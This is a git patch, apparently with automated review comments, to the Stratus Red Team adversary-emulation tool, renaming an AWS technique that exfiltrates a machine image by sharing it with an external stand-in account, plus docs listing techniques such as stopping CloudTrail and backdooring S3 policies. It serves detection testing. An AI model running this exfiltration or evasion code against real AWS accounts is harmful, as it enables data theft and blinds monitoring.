From cddbb98fef13dbc45e968e91272de82bb2266c4c Mon Sep 17 00:00:00 2001
From: Christophe Tafani-Dereeper
Date: Wed, 19 Jan 2022 21:37:05 +0100
Subject: [PATCH] Rename attack technique for AMI exfiltration (public sharing to sharing with external account)

---
 .../AWS/aws.exfiltration.ami-sharing.md | 24 +++++++++++++++++++
 docs/attack-techniques/AWS/index.md | 2 +-
 docs/attack-techniques/list.md | 2 +-
 .../{ami-make-public => ami-sharing}/main.go | 18 +++++++-------
 .../{ami-make-public => ami-sharing}/main.tf | 0
 internal/attacktechniques/main.go | 2 +-
 6 files changed, 36 insertions(+), 12 deletions(-)
 create mode 100755 docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md
 rename internal/attacktechniques/aws/exfiltration/{ami-make-public => ami-sharing}/main.go (77%)
 rename internal/attacktechniques/aws/exfiltration/{ami-make-public => ami-sharing}/main.tf (100%)

diff --git a/docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md b/docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md
new file mode 100755
index 00000000..6fd7dcf8
--- /dev/null
+++ b/docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md
@@ -0,0 +1,24 @@
+# Exfiltrate an AMI by AMI Sharing
+
+Platform: AWS
+
+## MITRE ATT&CK Tactics
+
+
+- Exfiltration
+
+## Description
+
+
+Exfiltrates an AMI by sharing it with an external AWS account.
+
+Warm-up: Create an AMI.
+
+Detonation: Share the AMI.
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate aws.exfiltration.ami-sharing
+```
\ No newline at end of file
diff --git a/docs/attack-techniques/AWS/index.md b/docs/attack-techniques/AWS/index.md
index e8c46084..e8bd65e4 100755
--- a/docs/attack-techniques/AWS/index.md
+++ b/docs/attack-techniques/AWS/index.md
@@ -25,7 +25,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT ## Exfiltration -- [Exfiltrate an AMI by Making it Public](./aws.exfiltration.ami-make-public.md) +- [Exfiltrate an AMI by AMI Sharing](./aws.exfiltration.ami-sharing.md) - [Exfiltrate EBS Snapshot through snapshot sharing](./aws.exfiltration.ebs-snapshot-shared-with-external-account.md)
diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md
index 0e9df308..85b1f6aa 100755
--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -14,7 +14,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Stop a CloudTrail Trail](./AWS/aws.defense-evasion.stop-cloudtrail.md) | [AWS](./AWS/index.md) | Defense Evasion |
 | [Remove VPC flow logs](./AWS/aws.defense-evasion.remove-vpc-flow-logs.md) | [AWS](./AWS/index.md) | Defense Evasion |
 | [Execute discovery commands on an EC2 instance](./AWS/aws.discovery.basic-enumeration-from-ec2-instance.md) | [AWS](./AWS/index.md) | Discovery |
-| [Exfiltrate an AMI by Making it Public](./AWS/aws.exfiltration.ami-make-public.md) | [AWS](./AWS/index.md) | Exfiltration |
+| [Exfiltrate an AMI by AMI Sharing](./AWS/aws.exfiltration.ami-sharing.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Exfiltrate EBS Snapshot through snapshot sharing](./AWS/aws.exfiltration.ebs-snapshot-shared-with-external-account.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Backdoor an S3 Bucket via its Bucket Policy](./AWS/aws.exfiltration.backdoor-s3-bucket-policy.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Open Ingress Port 22 on a Security Group](./AWS/aws.exfiltration.open-port-22-ingress-on-security-group.md) | [AWS](./AWS/index.md) | Exfiltration |
diff --git a/internal/attacktechniques/aws/exfiltration/ami-make-public/main.go b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.go
similarity index 77%
rename from internal/attacktechniques/aws/exfiltration/ami-make-public/main.go
rename to internal/attacktechniques/aws/exfiltration/ami-sharing/main.go
index 9bfaaf4c..5ac0a4b4 100644
--- a/internal/attacktechniques/aws/exfiltration/ami-make-public/main.go
+++ b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.go
@@ -18,14 +18,14 @@ var tf []byte
 
 func init() {
 	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
-		ID: "aws.exfiltration.ami-make-public",
-		FriendlyName: "Exfiltrate an AMI by Making it Public",
+		ID: "aws.exfiltration.ami-sharing",
+		FriendlyName: "Exfiltrate an AMI by AMI Sharing",
 		Description: `
-Exfiltrates an AMI by sharing it publicly.
+Exfiltrates an AMI by sharing it with an external AWS account.
 
 Warm-up: Create an AMI.
 
-Detonation: Share the AMI publicly.
+Detonation: Share the AMI.
 `,
 		Platform: stratus.AWS,
 		MitreAttackTactics: []mitreattack.Tactic{mitreattack.Exfiltration},
@@ -36,14 +36,14 @@ Detonation: Share the AMI publicly.
 }
 
 var amiPublicPermissions = []types.LaunchPermission{
-	{Group: types.PermissionGroupAll},
+	{UserId: aws.String("012345678901")},
 }
 
 func detonate(params map[string]string) error {
 	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
 	amiId := params["ami_id"]
 
-	log.Println("Exfiltrating AMI " + amiId + " by sharing it publicly")
+	log.Println("Exfiltrating AMI " + amiId + " by sharing it with an external AWS account")
 	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
 		ImageId: aws.String(amiId),
 		LaunchPermission: &types.LaunchPermissionModifications{
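Review bot: `Detonation: Share the AMI.` on the new side drops the detail the old text carried, and since the whole point of this rename is that the AMI is now shared with one specific external account rather than made public, the detonation line should say so: `Detonation: Share the AMI with an external AWS account.` The same text appears verbatim in the docs page this commit adds, which suggests the markdown is generated from this Description, so fixing it here and regenerating is presumably enough. `init` continues past the end of the hunk.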
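Review bot: `amiPublicPermissions` no longer describes what it holds — the new side stores a `UserId` launch permission for account `012345678901`, not a `PermissionGroupAll` grant — so the name misleads wherever `detonate` and `revert` use it; rename it (e.g. `amiExternalAccountLaunchPermissions`) and lift the account ID into a documented constant, `const externalAccountID = "012345678901" // stand-in attacker-controlled account the AMI is shared with`. Nothing on the visible lines says whether EC2 accepts a launch permission for this ID, and if the API rejects it as nonexistent the detonation fails, so that is worth confirming and recording in the same comment, together with the defender-facing fact that the artifact this technique produces is a CloudTrail `ModifyImageAttribute` event whose `LaunchPermission` add carries a `UserId` outside the organization. The sibling `ebs-snapshot-share` technique presumably shares with an external account the same way; if it hard-codes the same ID, one shared constant would keep the two consistent. `detonate` continues past the end of the hunk.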
@@ -52,7 +52,7 @@ func detonate(params map[string]string) error {
 	})
 
 	if err != nil {
-		return errors.New("Unable to share AMI publicly: " + err.Error())
+		return errors.New("Unable to share AMI with external AWS account: " + err.Error())
 	}
 
 	return nil
@@ -62,7 +62,7 @@ func revert(params map[string]string) error {
 	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
 	amiId := params["ami_id"]
 
-	log.Println("Reverting exfiltration of AMI " + amiId + " by removing public sharing")
+	log.Println("Reverting exfiltration of AMI " + amiId + " by removing cross-account sharing")
 	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
 		ImageId: aws.String(amiId),
 		LaunchPermission: &types.LaunchPermissionModifications{
@@ -71,7 +71,7 @@ func revert(params map[string]string) error {
 	})
 
 	if err != nil {
-		return errors.New("Unable to remove AMI public permissions: " + err.Error())
+		return errors.New("Unable to remove AMI permissions: " + err.Error())
 	}
 
 	return nil
diff --git a/internal/attacktechniques/aws/exfiltration/ami-make-public/main.tf b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.tf
similarity index 100%
rename from internal/attacktechniques/aws/exfiltration/ami-make-public/main.tf
rename to internal/attacktechniques/aws/exfiltration/ami-sharing/main.tf
diff --git a/internal/attacktechniques/main.go b/internal/attacktechniques/main.go
index da0d8b5e..0517d90b 100644
--- a/internal/attacktechniques/main.go
+++ b/internal/attacktechniques/main.go
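Review bot: The changed `return errors.New("Unable to share AMI with external AWS account: " + err.Error())` still flattens the SDK error into a string, so callers lose the error chain and cannot use `errors.As` on the underlying API error to distinguish, say, a rejected account ID from a missing `ec2:ModifyImageAttribute` permission; wrap instead with `return fmt.Errorf("Unable to share AMI with external AWS account: %w", err)`, and do the same for the revert message in the `@@ -71,7` hunk below. This needs `fmt` in the import block, which lies outside the visible hunks. `detonate` starts outside this hunk.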
@@ -6,7 +6,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/disable-cloudtrail"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/remove-vpc-flow-logs"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/discovery/discovery-commands-ec2-instance-role"
-	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-make-public"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-sharing"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ebs-snapshot-share"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/s3-bucket-backdoor-bucket-policy"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/securitygroup-open-port-22-to-internet"